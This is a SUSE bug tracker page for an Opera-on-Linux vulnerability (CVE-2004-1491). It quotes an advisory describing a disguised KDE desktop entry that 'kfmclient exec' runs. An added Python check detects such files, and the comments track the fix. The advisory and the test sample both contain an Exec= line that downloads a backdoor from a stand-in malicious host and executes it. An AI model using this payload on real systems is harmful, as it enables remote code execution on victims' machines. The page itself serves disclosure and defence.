Bug 64218 (CVE-2004-1491)

Summary: VUL-0: CVE-2004-1491: opera - trick user into running arbitrary commands
Product: [Novell Products] SUSE Security Incidents
Reporter: Ludwig Nussel <lnussel>
Component: Incidents
Assignee: Security Team bot <security-team>
Status: RESOLVED FIXED
QA Contact: Security Team bot <security-team>
Severity: Major
Priority: P3 - Medium
CC: christian.westgaard, security-team
Version: unspecified
Target Milestone: ---
Hardware: All
OS: Linux
Whiteboard: CVE-2004-1491: CVSS v2 Base Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:P/A:N)
Found By: Other
Services Priority:
Business Priority:
Blocker: ---
Marketing QA Status: ---
IT Deployment: ---

Description Ludwig Nussel 2004-12-14 21:10:20 UTC
We received the following report via full-disclosure.
The issue is public.

Date: Mon, 13 Dec 2004 18:05:14 +0000
From: Giovanni Delvecchio <badpenguin79@hotmail.com>
To: full-disclosure@lists.netsys.com
Subject: [Full-Disclosure] [ZH2004-19SA] Possible execution of remote shell commands in Opera with kfmclient
Reply-To: badpenguin@zone-h.org

Author: Giovanni Delvecchio
e-mail: badpenguin@zone-h.org

Tested version:
Opera 7.54, Linux version, with KDE 3.2.3

Original advisory: http://zone-h.org/en/advisories/read/id=6503/


Problem:
=======
Opera for Linux uses "kfmclient exec" as the "Default Application" to handle
saved files.
This could be used by malicious remote users to execute arbitrary shell
commands on a target system.
Indeed, the command "kfmclient exec" can be used to open a "KDE Desktop
Entry" and therefore execute the command in its "Exec=" entry.

Example of [KDE Desktop Entry]:

________________________________

# KDE Config File
[KDE Desktop Entry]
SwallowExec=
SwallowTitle=
BinaryPattern=
MimeType=
Exec="Any arbitrary command"
Icon=
TerminalOptions=
Path=
Type=Application
Terminal=0
______________________________


Possible method of Exploitation
===============================

This method of exploitation requires that a particular file name extension
is used.
If page.Htm is used as the file name and "kfmclient exec page.Htm" is run,
the command in the "Exec=" entry will be executed.
If "page.htm" is used as the file name instead, it will not be opened as a
KDE desktop entry but viewed in Konqueror.
It also works with the Jpg, Gif, etc. extensions, but not with jpg, gif,
etc., since the "system" is case sensitive.

Attack scenario:

1- A user clicks on a link which requests http://malicious_server/image.Jpg

2- malicious_server responds with an unknown Content-Type field, for
example "Content-Type: image/Jpeg." (note the dot at the end), so Opera will
show a dialog window.

3- If the user chooses "Open" to view image.Jpg, it will be opened by the
"kfmclient exec" command, since kfmclient is the "Default Application".

4- image.Jpg is a KDE desktop entry:

--------image.Jpg----------

# KDE Config File
[KDE Desktop Entry]
SwallowExec=
SwallowTitle=
BinaryPattern=
MimeType=
Exec=/bin/bash -c wget\thttp://malicious_site/backdoor;chmod\t777\tbackdoor;./backdoor
Icon=
TerminalOptions=
Path=
Type=Application
Terminal=0

---- end of image.Jpg-------

Note: \t is a horizontal tab.
In this case a backdoor will be downloaded onto the victim's computer and
executed.


Solution:
========
Disable "kfmclient exec" as the default application

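The report above turns on two things: a download handler that passes a saved file to a helper which executes its Exec= line, and an extension check that tells image.Jpg apart from image.jpg. The following is an added example for this page, not code from the advisory, from Opera or from KDE. It shows the check a download handler could apply before handing a file to an executing helper such as "kfmclient exec": sniff the content for a desktop-entry group and an Exec= key, compare the extension against the file signature case-insensitively, and refuse when they disagree. The sample files are constructed here (the malicious image.Jpg from the report, with its tabs written as real tab characters on one line, and the first bytes of a genuine JPEG); the reading of why the tabs matter is the editor's, not the advisory's.

```python
# Added example for this bug page (not code from the advisory, Opera or KDE):
# a content check that a browser's download handler could apply before handing
# a saved file to an executing helper such as "kfmclient exec". It catches the
# attack described in the report: a file named like an image whose contents are
# a KDE desktop entry carrying an Exec= command.
import re

# Constructed sample: the image.Jpg from the advisory, with the tabs written out
# as real tab characters on a single Exec= line (a .desktop value is one line).
MALICIOUS_IMAGE_JPG = (
    "# KDE Config File\n"
    "[KDE Desktop Entry]\n"
    "SwallowExec=\n"
    "SwallowTitle=\n"
    "BinaryPattern=\n"
    "MimeType=\n"
    "Exec=/bin/bash -c wget\thttp://malicious_site/backdoor;chmod\t777\tbackdoor;./backdoor\n"
    "Icon=\n"
    "TerminalOptions=\n"
    "Path=\n"
    "Type=Application\n"
    "Terminal=0\n"
).encode()

# Constructed sample: the start of a genuine JPEG (SOI marker, JFIF APP0 segment).
BENIGN_JPG = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00\x01\x01" + b"\x00" * 32

# File signatures for the image types the advisory names (plus PNG).
IMAGE_MAGIC = {
    b"\xff\xd8\xff": "image/jpeg",
    b"GIF87a": "image/gif",
    b"GIF89a": "image/gif",
    b"\x89PNG\r\n\x1a\n": "image/png",
}
IMAGE_EXTENSIONS = {"jpg", "jpeg", "gif", "png"}

# Group header of a desktop entry; the older "[KDE Desktop Entry]" spelling from
# the advisory is accepted alongside the freedesktop.org "[Desktop Entry]".
DESKTOP_GROUP = re.compile(rb"^\[(?:KDE )?Desktop Entry\]\s*$", re.M)


def sniff_image_type(data):
    """Return the MIME type implied by the file signature, or None."""
    for magic, mime in IMAGE_MAGIC.items():
        if data.startswith(magic):
            return mime
    return None


def parse_desktop_entry(data):
    """Return the key/value pairs of the first Desktop Entry group, or None
    if the data has no such group. Enough of the .desktop format for the
    check: '#' comments, one [group] header, key=value lines."""
    match = DESKTOP_GROUP.search(data)
    if match is None:
        return None
    entries = {}
    for raw in data[match.end():].splitlines():
        line = raw.strip()
        if not line or line.startswith(b"#"):
            continue
        if line.startswith(b"["):  # start of the next group
            break
        key, sep, value = line.partition(b"=")
        if sep:
            entries[key.strip().decode("utf-8", "replace")] = value.strip().decode("utf-8", "replace")
    return entries


def check_download(filename, data):
    """Decide whether a saved download may be passed to an executing helper.
    Returns 'ok', or a reason to refuse. The extension is compared
    case-insensitively so that 'image.Jpg' and 'image.jpg' get the same
    treatment; the advisory's trick depends on them being treated differently."""
    entries = parse_desktop_entry(data)
    if entries is not None:
        exec_cmd = entries.get("Exec")
        if exec_cmd:
            # The advisory uses tabs inside the Exec= value. An Exec tokenizer that
            # splits only on spaces hands bash -c the whole command as one argument,
            # while bash itself treats tabs as word separators (editor's reading of
            # why the tabs are there). Normalise them for the report.
            return "desktop entry with Exec=" + exec_cmd.replace("\t", " ")
        return "desktop entry without Exec"
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    if ext in IMAGE_EXTENSIONS and sniff_image_type(data) is None:
        return "extension claims an image but the content has no image signature"
    return "ok"


if __name__ == "__main__":
    for name, data in (("image.Jpg", MALICIOUS_IMAGE_JPG), ("image.Jpg", BENIGN_JPG)):
        print(name, "->", check_download(name, data))
```

Run stand-alone, the script reports the constructed image.Jpg as a desktop entry with its Exec= command and passes the real JPEG bytes under the same name. The desktop-entry test runs before the extension test on purpose: the file's own content, not its name or the server's Content-Type, decides whether it may reach a helper that executes things.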
Comment 1 Lukas Tinkl 2005-01-03 20:11:28 UTC
I'll talk to our Opera contact
Comment 2 Lukas Tinkl 2005-01-06 00:19:17 UTC
Waiting for answer from "Espen Sand" <espen@opera.com>
Comment 3 Ludwig Nussel 2005-01-18 21:23:12 UTC
any news? Did you check whether the report is valid at all?  
Comment 4 Lukas Tinkl 2005-01-30 17:47:45 UTC
It is confirmed and I still got no reply from Opera; I'll go and find a solution
myself.
Comment 5 Ludwig Nussel 2005-01-31 17:04:17 UTC
NEEDINFO is wrong as it refers to the reporter and I cannot provide the 
information you need. 
Comment 6 Christian Westgaard 2005-02-03 21:54:07 UTC
You may set default filehandler in
/usr/share/opera/ini/filehandler.ini

Or per user in (created on firstrun)
~/.opera/filehandler.ini (aka $OPERA_DIR/filehandler.ini)
Comment 7 Lukas Tinkl 2005-02-10 21:23:48 UTC
Fixed package submitted to stable
Comment 8 Thomas Biege 2005-03-09 12:17:57 UTC
Lukas,
please submit packages for older distributions too.

The "VUL-0" tag means that all supported versions need an update.

Thanks.

Comment 9 Lukas Tinkl 2005-03-09 13:13:48 UTC
OK, down to what version? 
Comment 10 Thomas Biege 2005-03-09 13:18:59 UTC
8.2
Comment 11 Thomas Biege 2005-03-09 13:38:41 UTC
CAN-2004-1491

SM-Tracker-578
Comment 12 Marcus Meissner 2005-03-14 14:09:24 UTC
8.2 version is still missing ....

patchinfo is missing
Comment 13 Thomas Biege 2005-03-14 14:14:06 UTC
please reassign to security-team when done. we'll submit patchinfo files then. 
Comment 14 Lukas Tinkl 2005-03-14 14:46:16 UTC
Reassigning, 8.2 submitted 
Comment 15 Marcus Meissner 2005-03-16 16:22:06 UTC
fixed packages released. 
Comment 16 Thomas Biege 2009-10-13 20:04:41 UTC
CVE-2004-1491: CVSS v2 Base Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:P/A:N)